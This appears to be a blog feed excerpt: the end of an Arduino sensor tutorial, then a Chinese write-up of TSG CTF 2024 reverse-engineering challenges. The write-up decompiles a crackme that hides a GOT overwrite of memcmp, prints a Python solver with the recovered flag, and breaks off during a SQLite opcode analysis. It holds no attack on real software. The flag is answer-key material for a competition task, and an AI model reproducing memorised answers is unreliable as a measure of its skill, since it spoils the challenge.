class="keyword">else</span> &#123;</span><br><span class="line">    Serial.<span class="built_in">println</span>(<span class="string">&quot;身份验证失败&quot;</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">esp_camera_fb_return</span>(fb);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h4 id="2-压力传感器读取代码"><a href="#2-压力传感器读取代码" class="headerlink" title="2. 压力传感器读取代码"></a><strong>2. 压力传感器读取代码</strong></h4><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">const</span> <span class="type">int</span> pressurePin = A0;</span><br><span class="line"><span class="type">const</span> <span class="type">int</span> threshold = <span class="number">300</span>; <span class="comment">// 压力阈值</span></span><br><span class="line"><span class="type">bool</span> isSeated = <span class="literal">false</span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">setup</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  Serial.<span class="built_in">begin</span>(<span class="number">9600</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">loop</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  <span class="type">int</span> pressureValue = <span class="built_in">analogRead</span>(pressurePin);</span><br><span class="line">  <span class="keyword">if</span> (pressureValue &gt; threshold) &#123;</span><br><span class="line">    <span class="keyword">if</span> (!isSeated) &#123;</span><br><span class="line">      Serial.<span class="built_in">println</span>(<span class="string">&quot;检测到用户入座&quot;</span>);</span><br><span class="line">      isSeated = <span class="literal">true</span>;</span><br><span class="line">      <span class="comment">// 开始定时提醒</span></span><br><span class="line">    &#125;</span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (isSeated) &#123;</span><br><span class="line">      Serial.<span class="built_in">println</span>(<span class="string">&quot;检测到用户离座&quot;</span>);</span><br><span class="line">      isSeated = <span class="literal">false</span>;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;Arduino入门到精通&quot;&gt;&lt;a href=&quot;#Arduino入门到精通&quot; class=&quot;headerlink&quot; title=&quot;Arduino入门到精通&quot;&gt;&lt;/a&gt;Arduino入门到精通&lt;/h1&gt;&lt;h2 id=&quot;超声波传感器&quot;&gt;&lt;a href=&quot;#超声波传感器&quot;</summary>
      
    
    
    
    
  </entry>
  
  <entry>
    <title>TSG CTF 2024 | Re</title>
    <link href="https://github.com/xyy9233/xyy9233.github.io.git/2024/12/24/tsg-ctf-2024-re-misbehave/"/>
    <id>https://github.com/xyy9233/xyy9233.github.io.git/2024/12/24/tsg-ctf-2024-re-misbehave/</id>
    <published>2024-12-23T16:00:00.000Z</published>
    <updated>2024-12-24T08:34:42.839Z</updated>
    
    <content type="html"><![CDATA[<h2 id="Misbehave"><a href="#Misbehave" class="headerlink" title="Misbehave"></a>Misbehave</h2><h3 id="题目分类："><a href="#题目分类：" class="headerlink" title="题目分类："></a>题目分类：</h3><p> <strong>&lt; 随机数 &gt;</strong>  <strong>&lt;自定义memcmp&gt;</strong></p><h3 id="题目信息："><a href="#题目信息：" class="headerlink" title="题目信息："></a>题目信息：</h3><blockquote><p>Author: mikanami </p><p>There’s something strange about this binary file… </p><p>Hints for beginners…</p><p>The attached file is an ELF executable for x86-64 Linux. Running it and entering the correct FLAG will display Correct!. Use tools like Ghidra or IDA Free to get an overview of the process. </p><p>Use gdb to observe its behavior while running. You don’t need to fully understand every single process. Sometimes, it’s enough to identify the inputs and outputs.</p><p><a href="https://www.notion.so/r3kapig-not1on/Misbehave-acb585d9730d4c68865b95ee314c6cf2?pvs=4#15cec1515fb980e49c0ad573215f0fc1">misbehave.tar.gz</a></p></blockquote><h3 id="题目总览："><a href="#题目总览：" class="headerlink" title="题目总览："></a>题目总览：</h3><p>file查看文件信息</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241215225702771.png" alt="image-20241215225702771"></p><p>扔IDA看逻辑：</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> __fastcall <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> **argv, <span class="type">const</span> <span class="type">char</span> **envp)</span></span><br><span class="line">&#123;</span><br><span class="line">  _DWORD v4[<span class="number">12</span>]; <span class="comment">// [rsp+0h] [rbp-40h] BYREF</span></span><br><span class="line">  <span class="type">int</span> v5; <span class="comment">// [rsp+30h] [rbp-10h]</span></span><br><span class="line">  <span class="type">int</span> v6; <span class="comment">// [rsp+34h] [rbp-Ch]</span></span><br><span class="line">  <span class="type">int</span> i; <span class="comment">// [rsp+38h] [rbp-8h]</span></span><br><span class="line">  <span class="type">char</span> v8; <span class="comment">// [rsp+3Fh] [rbp-1h]</span></span><br><span class="line"></span><br><span class="line">  v8 = <span class="number">1</span>;</span><br><span class="line">  v6 = <span class="number">4</span>;</span><br><span class="line">  input_flag(v4, <span class="number">48LL</span>, envp);  <span class="comment">//flag有48位</span></span><br><span class="line">  init(<span class="number">11447LL</span>, <span class="number">34LL</span>);  <span class="comment">//初始化v4</span></span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt;= <span class="number">11</span>; ++i )</span><br><span class="line">  &#123;</span><br><span class="line">    v5 = gen_rand(); <span class="comment">//生成随机数</span></span><br><span class="line">    v4[i] ^= v5;   <span class="comment">//与随机数异或</span></span><br><span class="line">    <span class="keyword">if</span> ( <span class="built_in">memcmp</span>(&amp;v4[i], (<span class="type">char</span> *)&amp;flag_enc + <span class="number">4</span> * i, v6) )  <span class="comment">//加密后与答案比较</span></span><br><span class="line">      v8 = <span class="number">0</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">if</span> ( v8 )</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Correct!&quot;</span>);</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;Wrong...&quot;</span>);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>看初始化v4：</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">char</span> *__fastcall <span class="title function_">init</span><span class="params">(__int64 offset_target_23B7, __int64 offset_source_22)</span><span class="comment">//这里修改传参名称，结合以下函数功能，23B7和22是main函数传入</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">char</span> *result; </span><br><span class="line"></span><br><span class="line">  state = <span class="number">0xFEEDF00DDEADBEEF</span>LL; <span class="comment">//初始化state</span></span><br><span class="line">  result = (<span class="type">char</span> *)&amp;loc_1381 + offset_source_22;</span><br><span class="line">  *(_QWORD *)((<span class="type">char</span> *)&amp;loc_1381 + offset_target_23B7) = (<span class="type">char</span> *)&amp;loc_1381 + offset_source_22; <span class="comment">//强制类型转换，将字节指针转换为指向 64 位数据的指针    //这里解释了main中检查密文只循环了12次</span></span><br><span class="line">    <span class="comment">//!!!!******这里！使用init函数内地址loc_1381的相对偏移量将uint64_t值写入该地址。重写的地址是memcmp@got，重写后的内容是函数13A3，也就是说，main函数调用的是23A3函数，而不是memcmp函数！！！！！***********</span></span><br><span class="line">   </span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>随机数生成函数，因为v5的变化在检查循环内，所以每个循环都会更新state的值</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">__int64 <span class="title function_">gen_rand</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">int</span> j; <span class="comment">// [rsp+1Ch] [rbp-24h]</span></span><br><span class="line">  <span class="type">int</span> i; <span class="comment">// [rsp+20h] [rbp-20h]</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">int</span> v3; <span class="comment">// [rsp+24h] [rbp-1Ch]</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v4; <span class="comment">// [rsp+28h] [rbp-18h]</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v5; <span class="comment">// [rsp+30h] [rbp-10h]</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v6; <span class="comment">// [rsp+38h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v6 = state &amp; <span class="number">0x1FF</span>;  </span><br><span class="line">  v5 = ((<span class="type">unsigned</span> __int64)state &gt;&gt; <span class="number">9</span>) &amp; <span class="number">0x7FF</span>;</span><br><span class="line">  v4 = ((<span class="type">unsigned</span> __int64)state &gt;&gt; <span class="number">20</span>) &amp; <span class="number">0x1FFF</span>;</span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt;= <span class="number">31</span>; ++i )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">for</span> ( j = <span class="number">0</span>; j &lt;= <span class="number">30</span>; ++j )</span><br><span class="line">    &#123;</span><br><span class="line">      v6 = ((v6 &gt;&gt; <span class="number">4</span>) ^ BYTE1(v6)) &amp; <span class="number">1</span> | (<span class="number">2</span> * (_WORD)v6) &amp; <span class="number">0x1FF</span>;</span><br><span class="line">      v5 = (BYTE1(v5) ^ (v5 &gt;&gt; <span class="number">10</span>)) &amp; <span class="number">1</span> | (<span class="number">2</span> * (_WORD)v5) &amp; <span class="number">0x7FF</span>;</span><br><span class="line">      v4 = ((v4 &gt;&gt; <span class="number">11</span>) ^ (v4 &gt;&gt; <span class="number">10</span>) ^ (v4 &gt;&gt; <span class="number">7</span>) ^ (v4 &gt;&gt; <span class="number">12</span>)) &amp; <span class="number">1</span> | (<span class="number">2</span> * (_WORD)v4) &amp; <span class="number">0x1FFF</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    v3 = (v5 &amp; (<span class="type">unsigned</span> __int8)v6 | (<span class="type">unsigned</span> __int8)(~(_BYTE)v6 &amp; v4)) &amp; <span class="number">1</span> | (<span class="number">2</span> * v3);</span><br><span class="line">  &#125;</span><br><span class="line">  state = v6 | (v4 &lt;&lt; <span class="number">20</span>) | (v5 &lt;&lt; <span class="number">9</span>);   <span class="comment">//&lt;---这里变化</span></span><br><span class="line">  <span class="keyword">return</span> v3;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>很好的memcmp，可能当作strcmp了（x</p><p>在调试起来发现，链接了另一个函数</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241215232226386.png" alt="image-20241215232226386"></p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241215232220596.png" alt="image-20241215232220596"></p><p>这里对state也有操作，每组数第一个数对state异或</p><h3 id="题目解决："><a href="#题目解决：" class="headerlink" title="题目解决："></a>题目解决：</h3><p>state初始值：</p><p>state &#x3D; 0xFEEDF00DDEADBEEFLL;</p><p>密文知道了：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">enflag = [  </span><br><span class="line">  <span class="number">0x20</span>, <span class="number">0x60</span>, <span class="number">0x6F</span>, <span class="number">0x90</span>, <span class="number">0xAE</span>, <span class="number">0x77</span>, <span class="number">0x8F</span>, <span class="number">0xF3</span>, <span class="number">0xFC</span>, <span class="number">0x09</span>, </span><br><span class="line">  <span class="number">0xA5</span>, <span class="number">0x5E</span>, <span class="number">0xDD</span>, <span class="number">0x6B</span>, <span class="number">0x39</span>, <span class="number">0x51</span>, <span class="number">0xDF</span>, <span class="number">0xFD</span>, <span class="number">0x6E</span>, <span class="number">0x5E</span>, </span><br><span class="line">  <span class="number">0xA8</span>, <span class="number">0x60</span>, <span class="number">0x88</span>, <span class="number">0x85</span>, <span class="number">0xBC</span>, <span class="number">0xD7</span>, <span class="number">0x95</span>, <span class="number">0x52</span>, <span class="number">0x75</span>, <span class="number">0xE9</span>, </span><br><span class="line">  <span class="number">0x82</span>, <span class="number">0xF3</span>, <span class="number">0xB7</span>, <span class="number">0xA2</span>, <span class="number">0x04</span>, <span class="number">0x95</span>, <span class="number">0x4A</span>, <span class="number">0x0E</span>, <span class="number">0x5C</span>, <span class="number">0x67</span>, </span><br><span class="line">  <span class="number">0x53</span>, <span class="number">0x81</span>, <span class="number">0x13</span>, <span class="number">0xBF</span>, <span class="number">0x34</span>, <span class="number">0x61</span>, <span class="number">0x70</span>, <span class="number">0xC1</span>]</span><br><span class="line">整理一下：</span><br><span class="line">enflag = [</span><br><span class="line">    <span class="number">0x906F6020</span>,<span class="number">0xF38F77AE</span>,</span><br><span class="line">    <span class="number">0x5EA509FC</span>,<span class="number">0x51396BDD</span>,</span><br><span class="line">    <span class="number">0x5E6EFDDF</span>,<span class="number">0x858860A8</span>,</span><br><span class="line">    <span class="number">0x5295D7BC</span>,<span class="number">0xF382E975</span>,</span><br><span class="line">    <span class="number">0x9504A2B7</span>,<span class="number">0x675C0E4A</span>,</span><br><span class="line">    <span class="number">0xBF138153</span>,<span class="number">0xC1706134</span>,</span><br><span class="line">]</span><br></pre></td></tr></table></figure><p>没有在memcmp被异或的state中间值：</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241215234159080.png" alt="image-20241215234159080"></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">initia = <span class="string">&#x27;19BC7C670&#x27;</span></span><br><span class="line">tmp = [</span><br><span class="line">    <span class="number">0xD3283374</span>,<span class="number">0x74FC6DEF</span>, </span><br><span class="line">    <span class="number">0xA03471DD</span>,<span class="number">0x86BF5A2A</span>,</span><br><span class="line">    <span class="number">0xECA0F9BC</span>,<span class="number">0xDB9E9D94</span>,</span><br><span class="line">    <span class="number">0xA47A61BA</span>,<span class="number">0x5A46820B</span>,</span><br><span class="line">    <span class="number">0xABD092BC</span>,<span class="number">0x7908986B</span>,</span><br><span class="line">    <span class="number">0x4AE82AEA</span>,<span class="number">0xE73A17DB</span>]</span><br></pre></td></tr></table></figure><p>在memcmp自定义函数中，第i+1个state会与第i组明文异或*</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">state_init = <span class="number">0xFEEDF00DDEADBEEF</span></span><br><span class="line">enflag = [</span><br><span class="line">    <span class="number">0x906F6020</span>,<span class="number">0xF38F77AE</span>,<span class="number">0x5EA509FC</span>,<span class="number">0x51396BDD</span>,</span><br><span class="line">    <span class="number">0x5E6EFDDF</span>,<span class="number">0x858860A8</span>,<span class="number">0x5295D7BC</span>,<span class="number">0xF382E975</span>,</span><br><span class="line">    <span class="number">0x9504A2B7</span>,<span class="number">0x675C0E4A</span>,<span class="number">0xBF138153</span>,<span class="number">0xC1706134</span>,</span><br><span class="line">]</span><br><span class="line">state_tmp = [ //这里还是偷懒了，直接摘出来的v5，没还原rand函数</span><br><span class="line">    <span class="number">0xD3283374</span>,<span class="number">0x9BF431FA</span>,<span class="number">0x6DC16DCD</span>,<span class="number">0x245F34B3</span>,</span><br><span class="line">    <span class="number">0x37599EB1</span>,<span class="number">0xB1D70E98</span>,<span class="number">0x21CAB3D2</span>,<span class="number">0xACE4D846</span>,</span><br><span class="line">    <span class="number">0xCA3392D0</span>,<span class="number">0x1539787A</span>,<span class="number">0x8822F324</span>,<span class="number">0xC1701C07</span></span><br><span class="line">    ]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">12</span>):</span><br><span class="line">    <span class="built_in">print</span>((state_tmp[i]^enflag[i]).to_bytes(<span class="number">4</span>, byteorder=<span class="string">&#x27;little&#x27;</span>))</span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">b&#x27;TSGC&#x27;</span></span><br><span class="line"><span class="string">b&#x27;TF&#123;h&#x27;</span></span><br><span class="line"><span class="string">b&#x27;1dd3&#x27;</span></span><br><span class="line"><span class="string">b&#x27;n_fu&#x27;</span></span><br><span class="line"><span class="string">b&#x27;nc7i&#x27;</span></span><br><span class="line"><span class="string">b&#x27;0n_4&#x27;</span></span><br><span class="line"><span class="string">b&#x27;nd_s&#x27;</span></span><br><span class="line"><span class="string">b&#x27;31f_&#x27;</span></span><br><span class="line"><span class="string">b&#x27;g07_&#x27;</span></span><br><span class="line"><span class="string">b&#x27;0ver&#x27;</span></span><br><span class="line"><span class="string">b&#x27;wr17&#x27;</span></span><br><span class="line"><span class="string">b&#x27;3&#125;\x00\x00&#x27;</span></span><br><span class="line"><span class="string">#TSGCTF&#123;h1dd3n_func7i0n_4nd_s31f_g07_0verwr173&#125;</span></span><br></pre></td></tr></table></figure><p>测试一下</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241216113234897.png" alt="image-20241216113234897"></p><h3 id="一些别的："><a href="#一些别的：" class="headerlink" title="一些别的："></a>一些别的：</h3><blockquote><p>グローバル変数<code>state</code>を初期化しています。そして、<code>init</code>関数内部のアドレス<code>loc_1381</code>からの相対オフセットを使ったアドレスへ、<code>uint64_t</code>値を書き込んでいます。計算すると、書き換え先のアドレスは<code>memcmp@got</code>、書き換え後の内容は<code>13A3</code>の関数でした。つまり、<code>main</code>関数では<code>memcmp</code>関数ではなく<code>13A3</code>の関数を呼び出します！</p><p>初始化全局变量状态。然后，使用 init 函数内地址 loc_1381 的相对偏移量将 uint64_t 值写入该地址。我算了一下，要重写的地址是memcmp@got，重写后的内容是函数13A3。也就是说，main函数调用的是13A3函数，而不是memcmp函数！</p><p> 4 字节 memcmp 的比较的同时，全局变量状态将通过与第一个参数的 XOR 结果进行更新。</p></blockquote><h2 id="Warmup-SQLite"><a href="#Warmup-SQLite" class="headerlink" title="Warmup SQLite"></a>Warmup SQLite</h2><h3 id="题目分类"><a href="#题目分类" class="headerlink" title="题目分类"></a>题目分类</h3><p><strong>&lt; SQLite opcode&gt;</strong></p><h3 id="题目信息"><a href="#题目信息" class="headerlink" title="题目信息"></a>题目信息</h3><blockquote><p>Author: mikitorium08</p><p> Let’s get familiar with SQLite’s bytecode</p><p> <a href="https://score.ctf.tsg.ne.jp/files/17b35e46816596c04bc80ee9bcf501cc/warmup_sqlite.tar.gz?token=eyJ1c2VyX2lkIjoxNCwidGVhbV9pZCI6MTAsImZpbGVfaWQiOjV9.Z10y4A.E95UAr01WKX7GAS0HjVWaakInYo">warmup_sqlite.tar.gz</a></p></blockquote><h3 id="题目分析"><a href="#题目分析" class="headerlink" title="题目分析"></a>题目分析</h3><p>一开始没怎么搞懂readme里在说什么</p><figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"># Warmup SQLite</span><br><span class="line"></span><br><span class="line">`dump` is the result of `EXPLAIN &lt;hidden SQL&gt;` with the parameter `~~Your input is filled here~~`.</span><br><span class="line"></span><br><span class="line">We use the same sqlite3 as SQLite of Hand, another pwn challenge in TSG CTF 5, to dump this code.</span><br><span class="line"></span><br><span class="line"># 预热 SQLite</span><br><span class="line">`dump` 是参数为 `~~Your input is filled here~~` 的 `EXPLAIN &lt;hidden SQL&gt;` 的结果。</span><br><span class="line">我们使用与 SQLite of Hand 相同的 sqlite3 来转储这段代码，SQLite of Hand 是 TSG CTF 5 中的另一项 Pwn 挑战。</span><br></pre></td></tr></table></figure><p>看python文件：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> sqlite3</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"></span><br><span class="line">res = [<span class="number">100</span>, <span class="number">115</span>, <span class="number">39</span>, <span class="number">99</span>, <span class="number">100</span>, <span class="number">54</span>, <span class="number">27</span>, <span class="number">115</span>, <span class="number">69</span>, <span class="number">220</span>, <span class="number">69</span>, <span class="number">99</span>, <span class="number">100</span>, <span class="number">191</span>, <span class="number">56</span>, <span class="number">161</span>, <span class="number">131</span>, <span class="number">11</span>, <span class="number">101</span>, <span class="number">162</span>, <span class="number">191</span>, <span class="number">54</span>, <span class="number">130</span>, <span class="number">175</span>, <span class="number">205</span>, <span class="number">191</span>, <span class="number">222</span>, <span class="number">101</span>, <span class="number">162</span>, <span class="number">116</span>, <span class="number">147</span>, <span class="number">191</span>, <span class="number">55</span>, <span class="number">24</span>, <span class="number">69</span>, <span class="number">130</span>, <span class="number">69</span>, <span class="number">191</span>, <span class="number">252</span>, <span class="number">101</span>, <span class="number">102</span>, <span class="number">101</span>, <span class="number">252</span>, <span class="number">189</span>, <span class="number">82</span>, <span class="number">116</span>, <span class="number">41</span>, <span class="number">147</span>, <span class="number">161</span>, <span class="number">147</span>, <span class="number">132</span>, <span class="number">101</span>, <span class="number">162</span>, <span class="number">82</span>, <span class="number">191</span>, <span class="number">220</span>, <span class="number">9</span>, <span class="number">205</span>, <span class="number">9</span>, <span class="number">100</span>, <span class="number">191</span>, <span class="number">38</span>, <span class="number">68</span>, <span class="number">253</span>]</span><br><span class="line"><span class="comment">#for i in range(len(res)):</span></span><br><span class="line"><span class="comment">#    print(chr(res[i]),end=&#x27;&#x27;)</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">check</span>(<span class="params">s</span>):</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">bool</span>(re.<span class="keyword">match</span>(<span class="string">&#x27;^[a-zA-Z0-9_=&#125;&#123;&quot;]+$&#x27;</span>, s))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">run</span>(<span class="params">s</span>):</span><br><span class="line">    conn = sqlite3.connect(<span class="string">&#x27;hello.db&#x27;</span>)</span><br><span class="line">    cursor = conn.cursor()</span><br><span class="line"></span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&#x27;query.sql&#x27;</span>, <span class="string">&#x27;r&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">        query = f.read()</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        cursor.execute(query, (s,))</span><br><span class="line">        <span class="keyword">for</span> (idx, row) <span class="keyword">in</span> <span class="built_in">enumerate</span>(cursor.fetchall()):</span><br><span class="line">            <span class="keyword">assert</span>(row[<span class="number">0</span>] == res[idx])</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&#x27;correct&#x27;</span>)</span><br><span class="line">    <span class="keyword">except</span> Exception <span class="keyword">as</span> _:</span><br><span class="line">        cursor.execute(query, (s,))</span><br><span class="line">        <span class="keyword">for</span> (idx, row) <span class="keyword">in</span> <span class="built_in">enumerate</span>(cursor.fetchall()):</span><br><span class="line">            <span class="keyword">assert</span>(row[<span class="number">0</span>] == res[idx])</span><br><span class="line">            <span class="built_in">print</span>(row[<span class="number">0</span>])</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&#x27;correct&#x27;</span>)</span><br><span class="line">    <span class="keyword">finally</span>:</span><br><span class="line">        conn.close()</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">main</span>():</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&#x27;input string: &#x27;</span>)</span><br><span class="line">    s = sys.stdin.readline().strip()</span><br><span class="line">    <span class="comment">#if not (s and len(s) == 64 and check(s)):</span></span><br><span class="line">    <span class="comment">#    print(&quot;wrong&quot;)</span></span><br><span class="line">    <span class="comment">#    return</span></span><br><span class="line">    run(s)</span><br><span class="line"></span><br><span class="line">main()</span><br></pre></td></tr></table></figure><p>检测flag是否64位，且<code>match(&#39;^[a-zA-Z0-9_=&#125;&#123;&quot;]+$&#39;, s)</code>，之后对flag处理，与res比较</p><p>对flag的check应该是在db里面，</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#sqlite3 Python library：使用 sqlite3 库来与 SQLite 数据库进行交互，并使用 EXPLAIN 获取 SQL 查询的 opcode 列表。</span></span><br><span class="line"><span class="keyword">import</span> sqlite3</span><br><span class="line"></span><br><span class="line">conn = sqlite3.connect(<span class="string">&#x27;example.db&#x27;</span>)</span><br><span class="line">cursor = conn.cursor()</span><br><span class="line">cursor.execute(<span class="string">&#x27;EXPLAIN QUERY PLAN SELECT * FROM my_table&#x27;</span>)</span><br><span class="line"><span class="built_in">print</span>(cursor.fetchall())</span><br></pre></td></tr></table></figure><p>看到文档里crazyman贴了一个：</p><p><a href="https://www.sqlite.org/opcode.html">https://www.sqlite.org/opcode.html</a></p><p>往下滑滑，找到一个很类似的东西，</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241220001558188.png" alt="image-20241220001558188"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">$ sqlite3 ex1.db</span><br><span class="line">sqlite&gt; explain delete from tbl1 where two&lt;20;</span><br><span class="line">addr  opcode         p1    p2    p3    p4             p5  comment      </span><br><span class="line">----  -------------  ----  ----  ----  -------------  --  -------------</span><br><span class="line">0     Init           0     12    0         